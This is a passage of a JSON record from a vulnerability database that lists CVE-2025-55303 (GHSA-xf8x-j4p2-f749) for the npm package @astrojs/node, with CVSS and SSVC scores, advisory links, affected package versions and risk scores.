"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55303" }, { "reference_url": "https://github.com/advisories/GHSA-xf8x-j4p2-f749", "reference_id": "GHSA-xf8x-j4p2-f749", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-xf8x-j4p2-f749" }, { "reference_url": "https://github.com/withastro/astro/security/advisories/GHSA-xf8x-j4p2-f749", "reference_id": "GHSA-xf8x-j4p2-f749", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-19T20:49:42Z/" } ], "url": "https://github.com/withastro/astro/security/advisories/GHSA-xf8x-j4p2-f749" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/86140?format=api", "purl": "pkg:npm/%40astrojs/node@9.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-b47j-p5et-rfem" }, { "vulnerability": "VCID-c6g3-td4y-gbgj" }, { "vulnerability": "VCID-ecmk-efnj-nbfq" }, { "vulnerability": "VCID-jt7q-nwep-wbfb" }, { "vulnerability": "VCID-mhk4-vf4t-47g7" }, { "vulnerability": "VCID-mu7k-psez-uudf" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.1.1" } ], "aliases": [ "CVE-2025-55303", "GHSA-xf8x-j4p2-f749" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qcs7-nt67-7qe5" } ], "fixing_vulnerabilities": [], "risk_score": "3.9", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.0.3" }